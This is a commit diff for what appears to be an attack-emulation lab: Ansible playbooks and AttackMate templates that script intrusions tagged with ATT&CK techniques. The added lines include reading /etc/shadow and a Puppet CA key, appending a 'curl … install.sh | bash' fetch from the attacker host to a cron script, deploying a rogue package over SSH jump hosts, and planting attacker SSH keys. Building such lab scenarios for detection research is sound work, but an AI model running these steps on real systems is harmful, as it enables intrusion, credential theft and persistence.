Fixes scenario 3 and 4

.gitignore

@@ -2,6 +2,7 @@ roles/
 venv/
 .venv/
 .venv/*
+ansible/.venv*
 .env
 .terragrunt-cache/
 .terraform.lock.hcl
@@ -10,6 +11,7 @@ docs/build/
 *.qcow2
 .mypy_cache/
 *.tfstate
+*tar.gz
 
 # temporary packer-key(debug)
 os_builder.pem

ansible/run/scenario1/main.yml

@@ -156,6 +156,7 @@
               owner: "root"
               mode: "0755"
       tags:
+          - scenario_1_d_a
           - scenario_1_e_a
           - scenario_1_c_a
 

ansible/run/scenario1/templates/scenario_1_c_a.j2

@@ -8,6 +8,11 @@ vars:
   $ATTACKER_ADDRESS: 192.42.1.174
   $DNS_SERVER: 192.42.0.233
   $ADMIN_SERVER: 10.12.0.222
+
+###################################################
+# YOU NEED TO ENTER YOUR  MGMT_IP FOR YOUR SETUP! #
+###################################################
+
   $MGMT_IP: 192.42.0.201
   $MGMT_USERNAME: aecid
   $DOMAIN: attackbed.com

ansible/run/scenario1/templates/scenario_1_c_b.j2

@@ -8,6 +8,11 @@ vars:
   $ATTACKER_ADDRESS: 192.42.1.174
   $DNS_SERVER: 192.42.0.233
   $ADMIN_SERVER: 10.12.0.222
+
+###################################################
+# YOU NEED TO ENTER YOUR  MGMT_IP FOR YOUR SETUP! #
+###################################################
+
   $MGMT_IP: 192.42.0.201
   $MGMT_USERNAME: aecid
   $DOMAIN: attackbed.com

ansible/run/scenario1/templates/scenario_1_c_c.j2

@@ -8,6 +8,11 @@ vars:
   $ATTACKER_ADDRESS: 192.42.1.174
   $DNS_SERVER: 192.42.0.233
   $ADMIN_SERVER: 10.12.0.222
+
+###################################################
+# YOU NEED TO ENTER YOUR  MGMT_IP FOR YOUR SETUP! #
+###################################################
+
   $MGMT_IP: 192.42.0.201
   $MGMT_USERNAME: aecid
   $DOMAIN: attackbed.com

ansible/run/scenario1/templates/scenario_1_d_a.j2

@@ -8,6 +8,11 @@ vars:
   $ATTACKER_ADDRESS: 192.42.1.174
   $DNS_SERVER: 192.42.0.233
   $ADMIN_SERVER: 10.12.0.222
+
+###################################################
+# YOU NEED TO ENTER YOUR  MGMT_IP FOR YOUR SETUP! #
+###################################################
+
   $MGMT_IP: 192.42.0.201
   $MGMT_USERNAME: aecid
   $DOMAIN: attackbed.com

ansible/run/scenario1/templates/scenario_1_e_b.j2

@@ -8,8 +8,6 @@ vars:
   $ATTACKER_ADDRESS: 192.42.1.174
   $DNS_SERVER: 192.42.0.233
   $ADMIN_SERVER: 10.12.0.222
-  $MGMT_IP: 192.42.0.201
-  $MGMT_USERNAME: aecid
   $DOMAIN: attackbed.com
   $USER: aecid
   $DNS_LIST: /usr/local/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

ansible/run/scenario3/main.yml

@@ -39,16 +39,84 @@
         - attackmate
         - playbooks
 
-    - name: Ensure delay before commands
-      ansible.builtin.replace:
+    - name: Add cmd_config block to end of /etc/attackmate.yml
+      ansible.builtin.blockinfile:
         path: /etc/attackmate.yml
-        regexp: 'command_delay: 0'
-        replace: 'command_delay: 15'
+        block: |
+          cmd_config:
+            command_delay: 15
+        create: true  # Creates the file if it doesn't exist
         backup: yes
+        insertafter: EOF 
+        marker: "# {mark} ANSIBLE MANAGED BLOCK FOR CMD_CONFIG"
       become: true
       tags:
         - playbooks
 
+
+# this is the key needed for scenario a_c when mgmt is used as jump host
+    - name: Generate SSH key pair for attacker to access mgmt
+      ansible.builtin.openssh_keypair:
+        path: "{{ user_home.stdout }}/.ssh/attacker_mgmt"
+        type: rsa
+        size: 4096
+        owner: "{{ attacker_user }}"
+        group: "{{ attacker_user }}"
+        mode: '0600'
+      tags:
+        - ssh
+        - playbooks
+
+    - name: Read SSH public key from attacker
+      become: yes
+      ansible.builtin.slurp:
+        src: "{{ user_home.stdout }}/.ssh/attacker_mgmt.pub"
+      register: ssh_key_mgmt
+      tags:
+        - ssh
+        - playbooks
+
+    - name: Add public key to mgmt's authorized_keys
+      become: yes
+      ansible.builtin.authorized_key:
+        user: aecid
+        state: present
+        key: "{{ ssh_key_mgmt.content | b64decode }}"
+      delegate_to: mgmt
+      tags:
+        - ssh
+        - playbooks
+
+    - name: Set attacker_mgmt_public_key as a fact
+      ansible.builtin.set_fact:
+        attacker_mgmt_public_key: "{{ ssh_key_mgmt.content | b64decode }}"
+      tags:
+        - ssh
+        - playbooks
+
+- name: add ssh key to adminpc2
+  hosts: adminpc2
+  become: true
+  tasks:
+    - name: Add public key to adminpcs's authorized_keys
+      become: yes
+      ansible.builtin.authorized_key:
+        user: aecid
+        state: present
+        key: "{{ hostvars['attacker']['attacker_mgmt_public_key'] }}"
+      tags:
+        - ssh
+        - playbooks
+
+- name: Install Attacker Host Part 2
+  hosts: attacker
+  become: true
+  vars:
+    attacker_user: aecid
+    attacker_ip: 192.42.1.174
+    delay_before_attack: 600
+  tasks:
+
     - name: Copy user-password-combo
       ansible.builtin.copy:
               src: user_pass_combo.txt

ansible/run/scenario3/templates/scenario_3_a_c.j2

@@ -7,7 +7,8 @@ vars:
   $SERVER_ADDRESS: fw.attackbed.com
   $ATTACKER_ADDRESS: 192.42.1.174
   $DNS_SERVER: 192.42.0.233
-  $ADMIN_SERVER: 10.12.0.222
+  $ADMIN_SERVER: 10.12.0.223
+  $MGMT_IP: 192.42.0.201
 
 commands:
   - type: shell
@@ -256,11 +257,6 @@ commands:
     cmd: "cd /var/www/html/debian/\n"
     interactive: True
 
-#  - type: ssh
-#    session: foothold
-#    cmd: "rm healthcheckd_1.0-1_amd64.deb\n"
-#    interactive: True
-
   - type: ssh
     session: foothold
     cmd: "dpkg-scanpackages . | gzip -c9  > Packages.gz\n"
@@ -270,15 +266,9 @@ commands:
       tactics: "Execution,Lateral Movement"
       technique_name: "Software Deployment Tools"
 
-
-  - type: ssh
-    cmd: echo "ssh -i .ssh/rootkey -o StrictHostKeyChecking=no [email protected] \"apt update && apt install -y healthcheckd\"" | at now + 2 minute
-    hostname: $ADMIN_SERVER
-    username: aecid
-    password: aecid
-    jmp_hostname:  192.42.2.42
-    clear_cache: True
-    exit_on_error: False
+ # connect via jumphost to admin host, that ssh to linuxshare
+  - type: shell
+    cmd: ssh -i ~/.ssh/attacker_mgmt -o StrictHostKeyChecking=no -o "ProxyCommand=ssh -i ~/.ssh/attacker_mgmt -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -W %h:%p aecid@$MGMT_IP" [email protected] 'echo "ssh -i .ssh/rootkey -o StrictHostKeyChecking=no [email protected] '\''apt update && apt install -y healthcheckd'\''" | at now + 2 minute'
     metadata:
       delayed_manifestation: "120s"
 

ansible/run/scenario3/templates/scenario_3_b_a.j2

@@ -5,7 +5,7 @@
 ####################
 
 # for vnc connection to the display, tunnel with : ssh -J aecid@<mgmt-ip> -L 5901:172.17.100.122:5901 [email protected]
-# then vncviewer localhost:5091
+# then vncviewer localhost:5901
 
 vars:
   $SERVER_ADDRESS: fw.attackbed.com
@@ -87,6 +87,7 @@ commands:
       techniques: "T1021.005"
       tactics: "Lateral Movement"
       technique_name: "Remote Services: VNC"
+      action: "terminal"
 
   - type: sleep
     seconds: 3
@@ -107,6 +108,7 @@ commands:
       techniques: "T1021.005"
       tactics: "Lateral Movement"
       technique_name: "Remote Services: VNC"
+      action: "sudo -i"
 
   - type: sleep
     seconds: 3
@@ -124,6 +126,8 @@ commands:
     session: foothold
     cmd: type
     input: "id"
+    metadata:
+      action: "id"
 
   - type: sleep
     seconds: 3
@@ -141,6 +145,8 @@ commands:
     session: foothold
     cmd: type
     input: "cat /etc/shadow"
+    metadata:
+      action: "cat /etc/shadow"
 
   - type: sleep
     seconds: 3
@@ -162,6 +168,8 @@ commands:
     session: foothold
     cmd: type
     input: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem"
+    metadata:
+      action: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem"
 
   - type: sleep
     seconds: 3
@@ -183,6 +191,8 @@ commands:
     session: foothold
     cmd: type
     input: "cat /media/share/healthcheck_cron.sh"
+    metadata:
+      action: "cat /media/share/healthcheck_cron.sh"
 
   - type: sleep
     seconds: 3
@@ -208,6 +218,7 @@ commands:
       techniques: "T1105,T1059.004,T1053.003,T1021.005,T1071.001"
       tactics: "Execution,Defense Evasion,Persistence,Command and Control"
       technique_name: "Ingress Tool Transfer,Command and Scripting Interpreter: Unix Shell,Scheduled Task/Job: Cron,Remote Services: VNC,Application Layer Protocol: Web Protocols"
+      action: "echo 'curl http://$ATTACKER_ADDRESS:8888/install.sh | bash' >> /media/share/healthcheck_cron.sh"
 
   - type: sleep
     seconds: 2

ansible/run/scenario3/templates/scenario_3_b_b.j2

@@ -88,6 +88,7 @@ commands:
       techniques: "T1021.005"
       tactics: "Lateral Movement"
       technique_name: "Remote Services: VNC"
+      action: "terminal"
 
   - type: sleep
     seconds: 3
@@ -108,6 +109,7 @@ commands:
       techniques: "T1021.005"
       tactics: "Lateral Movement"
       technique_name: "Remote Services: VNC"
+      action: "sudo -i"
 
   - type: sleep
     seconds: 3
@@ -125,6 +127,8 @@ commands:
     session: foothold
     cmd: type
     input: "id"
+    metadata:
+      action: "id"
 
   - type: sleep
     seconds: 3
@@ -142,6 +146,8 @@ commands:
     session: foothold
     cmd: type
     input: "cat /etc/shadow"
+    metadata:
+      action: "cat /etc/shadow"
 
   - type: sleep
     seconds: 3
@@ -163,6 +169,8 @@ commands:
     session: foothold
     cmd: type
     input: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem"
+    metadata:
+      action: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem"
 
   - type: sleep
     seconds: 3
@@ -184,6 +192,8 @@ commands:
     session: foothold
     cmd: type
     input: "cat /media/share/healthcheck_cron.sh"
+    metadata:
+      action: "cat /media/share/healthcheck_cron.sh"
 
   - type: sleep
     seconds: 3
@@ -198,7 +208,7 @@ commands:
       technique_name: "Data from Network Shared Drive"
 
   - type: sleep
-    seconds: 2 
+    seconds: 2
 
 #  HERE THE REVERSE SHELL FOR PORTFORWARDING ON THE REPOSERVER IS ESTABLISHED
   - type: vnc